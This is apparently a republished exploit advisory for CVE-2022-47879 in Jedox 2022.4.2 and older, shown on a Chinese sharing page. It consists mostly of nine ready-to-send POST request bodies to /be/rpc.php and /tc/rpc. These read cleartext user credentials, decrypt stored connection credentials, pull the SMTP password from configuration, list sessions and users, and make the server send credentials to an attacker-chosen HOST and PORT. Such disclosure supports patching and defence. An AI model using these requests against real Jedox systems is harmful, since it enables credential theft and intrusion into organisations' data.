扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 |
# Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2022.4 (22.4.2) and older # CVE : CVE-2022-47879 Introduction ================= A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute its methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) The <code>Studio::getUserCreds</code> function can be used to read the clear text credentials of the currently authenticated user. PATH: /be/rpc.php METHOD: POST BODY: [ [ "Studio", "getUserCreds" ] ] 2) Using function <code>conn::test_palo</code>, an outgoing HTTP connection can be initiated from the web server to an attacker controlled server (Specify HOST and PORT) with the authenticated user's credentials. This could leak cleartext credentials to an attacker. PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "test_palo", [ "<HOST>", "<PORT>", "", "", true, null ] ] ] 3) The function <code>Studio::getExternURI</code> can be used to generate a URL with embedded username and encrypted password of the currently authenticated user. PATH: /be/rpc.php METHOD: POST BODY: [ [ "Studio", "getExternURI", [ 0, "", [ 0 ], { "flag":1 } ] ] ] 4) List all available database connections via <code>conn::ls</code>: PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "ls", [ null, false, true, [ "type", "active", "description" ] ] ] ] 5) Retrieve details of individual database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function <code>com.jedox.etl.mngr.Connection::getGlobalConnection</code>: PATH: /tc/rpc METHOD: POST BODY: [ [ "com.jedox.etl.mngr.Connections", "getGlobalConnection", [ "<CONNECTION>" ] ] ] 6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using <code>common::decrypt</code> (specify encrypted credentials via ENCRYPTEDCREDS): PATH: /be/rpc.php METHOD: POST BODY: [ [ "common", "decrypt", [ "<ENCRYPTEDCREDS>" ] ] ] 7) Using <code>common::paloGet</code> it is possible to read arbitrary configuration parameters (specify config param via CONFIG. For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password): PATH: /be/rpc.php METHOD: POST BODY: [ [ "common", "paloGet", [ null, "Config", "#_config", [ "config" ], { "config": [ "<CONFIG>" ] }, true, true ] ] ] 8) The function <code>palo_mgmt::sess_list</code> can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data. PATH: /be/rpc.php METHOD: POST BODY: [ [ "palo_mgmt", "sess_list", [ null ] ] ] 9) The function <code>palo_mgmt::lic_users_list</code> returns a list of all users stored in the system: PATH: /be/rpc.php METHOD: POST BODY: [ [ "palo_mgmt", "lic_users_list", [ "0" ] ] ] |
体验盒子
